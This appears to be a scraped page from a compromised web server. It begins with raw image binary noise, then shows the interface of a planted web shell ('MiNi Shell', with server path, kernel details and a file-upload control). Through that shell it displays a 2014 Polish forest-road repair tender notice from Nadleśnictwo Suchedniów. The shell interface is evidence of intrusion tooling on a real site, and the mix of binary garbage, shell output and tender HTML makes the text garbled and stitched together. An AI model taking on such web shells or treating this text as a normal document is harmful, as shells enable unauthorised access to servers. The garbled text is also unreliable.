JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140812/269266-N-2014.html

<p class="kh_header"><b>Suchedniów: Remont dróg leśnych w Nadleśnictwie Suchedniów w 2014 r</b><br>
<b>Numer ogłoszenia: 269266 - 2014; data zamieszczenia: 12.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa - Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Suchedniów , ul. Bodzentyńska 16, 26-130 Suchedniów, woj. świętokrzyskie, tel. 041 2543045, 2543247, faks 041 2543139.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.radom.lasy.gov.pl/suchedniow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa - Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg leśnych w Nadleśnictwie Suchedniów w 2014 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w zakresie: Remont dróg leśnych w Nadleśnictwie Suchedniów polegający na robotach ziemnych, remoncie urządzeń odwadniających, remoncie nawierzchni z kruszyw zgodnie z dokumentacją projektową i dokumentacją techniczną (STWiOR). Jak niżej :

Zadanie nr 1   -   Droga Leśnictwo Jastrzębia nr inw. 220/801
Zadanie nr 2   -   Droga Leśnictwo Rejów nr inw.  220/157
Zadanie nr 3   -   Droga Leśnictwo Bronkowice nr inw. 220/151			
	
Szczegółowy zakres prac znajduje się w  przedmiarze robót w oparciu o dokumentację projektową oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych, dokumentacji technicznej  stanowiących załącznik nr 7 do 9  specyfikacji istotnych warunków zamówienia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, iż przewiduje  możliwość udzielenia zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych polegających na powtórzeniu tego samego rodzaju prac będących przedmiotem zamówienia, o wartości do 30 %  szacunkowej wartości zamówienia podstawowego, w okresie 3 lat od udzielenia zamówienia podstawowego (terminu podpisania umowy)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.12.13-4, 45.23.24.52-5, 45.11.12.00-0, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości:
Zadanie nr 1   -   Droga Leśnictwo Jastrzębia nr inw. 220/801 -   1 000,00 zł.
Zadanie nr 2   -   Droga Leśnictwo Rejów nr inw.  220/157    -     1 000,00 zł.
Zadanie nr 3   -   Droga Leśnictwo Bronkowice nr inw. 220/151 -800,00 zł.		

Przy składaniu ofert na więcej niż jedno zadanie, oferta musi być zabezpieczona wadium o wartości wynikającej z sumy wadiów przewidzianych dla zadań na które składa ofertę Wykonawca.
	Wadium może być wnoszone w jednej lub kilku następujących formach:
	pieniądzu,
	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                   z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia                                   9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42 poz. 275 z późn. zm.).

Wadium wpłacane w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:
 BGŻ S.A.O/W Kielce 67 2030 0045 1110 0000 0027 6610.

Nie dopuszcza się wnoszenia wadium w formie pieniężnej do kasy Zamawiającego.

Wadia wnoszone w innych formach niż pieniądz należy deponować w kasie w siedzibie Zamawiającego.

Wadium należy wnieść w terminie do dnia  28.08.2014 r. do godz. 10:00.
       
		        W przypadku wniesienia wadium w pieniądzu za moment wniesienia uznaje się moment 	        uznania rachunku Zamawiającego. 

Gwarancja musi być podpisana przez upoważnionego przedstawiciela gwaranta. Podpis winien 	        być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną 		        pieczątką lub czytelny (z podaniem imienia i nazwiska).

		       Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez 	           	       Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty 	     		       Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust.4a i 5 ustawy       
             z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych (tekst jednolity Dz. U. z 2013 r.          
             poz. 907 z póżń. zm.).

	        Gwarancja powinna zabezpieczać cały okres związania ofertą.

Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, zrealizowano roboty budowlane o podobnym charakterze przedmiotowym i wartościowym - w tym przynajmniej dwa zadania o łącznej  wartości minimum 100 000,00 zł brutto - słownie złotych: sto tysięcy złotych. Zamawiający dokona oceny spełniania warunków, o których mowa wyżej badając oświadczenia i dokumenty złożone przez Wykonawców.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły 0-1 (spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać, że dysponuje się osobami zdolnymi do wykonania zamówienia, minimum jedną osobą przewidzianą do kierowania robotami budowlanymi          w budownictwie drogowym. Zamawiający dokona oceny spełniania warunków, o których mowa wyżej badając oświadczenia i dokumenty złożone przez Wykonawców.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły 0-1 (spełnia - nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać, że dysponuje się środkami finansowymi lub zdolnością kredytową w wysokości minimum 30.000 zł. - słownie złotych: trzydzieści tysięcy, na każde zadanie oraz, że posiada się opłaconą polisę a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, zawartą na kwotę minimum 100 000,00 zł. (słownie złotych: sto tysięcy). Zamawiający dokona oceny spełniania warunków, o których mowa wyżej badając oświadczenia i dokumenty złożone przez Wykonawców.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły 0-1 (spełnia - nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 2. Zamawiający żąda, aby Wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, np. aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy. Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z dokumentów, o których mowa powyżej, do oferty należy dołączyć także stosowne pełnomocnictwo.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Dopuszczalność zmian istotnych postanowień umowy:
  1.1.  w zakresie zmiany terminu realizacji:
a)   Zmiany spowodowane niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi           
      wykonywanie robót, w szczególności:
           -      klęski żywiołowe,
           -      działania siły wyższej,
-	  wysoki stan wód powierzchniowych spowodowany opadami atmosferycznymi,
-	  utrzymujące się niskie temperatury i pokrywa śnieżna, 
-	  rozmiękczenie gruntu uniemożliwiające poruszanie się sprzętu, 
-	  wystąpienie innych zagrożeń uszkodzenia dróg dojazdowych w wyniku transportu materiałów. 
 
b)	Zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi,           w szczególności: 
         -	niewypały i niewybuchy, 
         -	wykopaliska archeologiczne.
 
c)	Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,                              w szczególności: 
        -	wstrzymanie robót przez Zamawiającego na jego wyraźne żądanie, 
        -	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,

d)	Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac, a w szczególności konieczność udzielenia zamówienia dodatkowego w rozumieniu przepisów PZP, 
  e)	innych okoliczności związanych z przedłużającą się procedurą przetargową mających wpływ na termin podpisania umowy i przystąpienie do realizacji prac. Odmowa wydania przez organ administracji wymaganych decyzji, zezwoleń, uzgodnień, skutkujących niemożliwością prowadzenia prac.

-	Warunki dokonania zmiany: 

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1.1. a) - e) termin
wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia
wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych
okoliczności. 

1.2.   Zmiana sposobu spełnienia świadczenia co może spowodować zmianę terminu realizacji zamówienia lub zmianę wynagrodzenia Wykonawcy:
a)   zmiany technologiczne, w szczególności:
      -	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu, 
      -	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa. 

      -	Powyższe zmiany będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom.

1.3.    Zmiany osobowe - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego.
1.4.    Pozostałe zmiany - zmiany wynagrodzenia: 
a)	zmiana obowiązującej stawki VAT: 
     -       jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę, 
     -       jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę, 
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł                    w związku z wynikającymi z umowy planowanymi świadczeniami. 
c)	Zamawiający dopuszcza wprowadzenie zmiany materiałów urządzeń przedstawionych w ofercie przetargowej, pod warunkiem że zmiany te będą korzystne dla Zamawiającego. Będą to, przykładowo okoliczności:
      -    powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację                                     i konserwację wykonanego przedmiotu umowy,
      -           powodujące poprawienie parametrów technicznych
      -    wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.

Warunki dokonania zamian: 

Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może
wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 

Wykonawca przed przystąpieniem do wprowadzenia jakichkolwiek zmian co do projektu,
kosztorysu bądź STWiOR musi uzyskać bezwarunkową pisemną zgodę Zamawiającego. 

1.5.   Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. - Prawo   zamówień publicznych (tekst jedn. Dz. U. z 2013 r. poz. 907 z późn. zmianami) : 
a)	     zmiana danych związanych z obsługą administracyjno-organizacyjną, np.: zmiana nr rachunku  bankowego), 
b)	     zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami, 


1.6.    Określa się następujący tryb dokonywania zmian postanowień umowy: 
a)	Sposób inicjowania zmian: 
      -	Zamawiający: wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany. 
      -	Wykonawca: wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany. 
b)	Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać                   w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności, itp.)
c).	Protokół konieczności wymaga potwierdzenia przez projektanta i zatwierdzenia przez Zamawiającego. 

2.  Zamawiający załącza do siwz projekt umowy - stanowiący zał. nr 4.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_radom/nadl_suchedniow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Suchedniów 
ul. Bodzentyńska 16, 26-130 Suchedniów
parter, pokój numer 14 lub 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2014 godzina 10:00, miejsce: Nadleśnictwo Suchedniów 
ul. Bodzentyńska 16, 26-130 Suchedniów, I piętro, pokój numer 102 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.1. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający wskaże miejsce i termin podpisania umowy.
1.2. Wykonawca przedstawi Zamawiającemu do wglądu projekt umowy jaką zamierza zawrzeć                            z podwykonawcami. Jeżeli zamawiający w terminie 14 dni od otrzymania projektu umowy nie wniesie zastrzeżeń  lub sprzeciwu na piśmie  uważać się będzie, że wyraził zgodę  na zawarcie tej umowy.
1.3. Wykonawca przedstawi Zamawiającemu do wglądu dokumenty lub dowody potwierdzające, że   przynajmniej dwa zadania o łącznej wartości minimum 100.000,00 zł. (słownie złotych: sto tysięcy ) brutto, wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

1.4. Wykonawca przedstawi Zamawiającemu do wglądu polisę ubezpieczenia OC prac związanych                   z w/w zadaniem zawartą na kwotę co najmniej 100 000,00 zł (słownie złotych: sto tysięcy) obowiązującą przez cały okres  trwania umowy.
1.5. W przypadku, jeżeli okaże się że Wykonawca którego oferta została wybrana będzie uchylał się od zawarcia umowy, nie wniesie wymaganego zabezpieczenia należytego wykonania umowy, lub nie przedstawi do wglądu dokumentów o których mowa w pkt. 17.2. - 17.5. Zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert bez przeprowadzania ich ponownego badania                 i oceny, chyba że zachodzą przesłanki unieważnienia postępowania, o których mowa w art. 93 ust. 1 ustawy Pzp.

2. Wymagania dotyczące zabezpieczenia należytego wykonania umowy

2.1.	Wykonawca, którego oferta została wybrana jako najkorzystniejsza zobowiązany jest, przed podpisaniem umowy, do wniesie?nia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 10% ceny całkowitej poda?nej w ofercie, w formie określonej w art. 148 ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych (tekst jednolity Dz. U. z 2013 r. poz. 907 z późn. zmianami).
2.2.	W celu pokrycia roszczeń z tytułu rękojmi  za wady przedmiotu zamówienia, Wykonawca wniesie zabezpieczenie w wysokości 30% zabezpieczenia podanego wyżej.
2.3.	Zwrot zabezpieczenia należytego wykonania umowy nastąpi w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane. Natomiast zabezpieczenie wniesione na okres rękojmi za wady zostanie zwrócone nie później niż w 15-tym dniu po upływie okresu rękojmi za wady.</p>
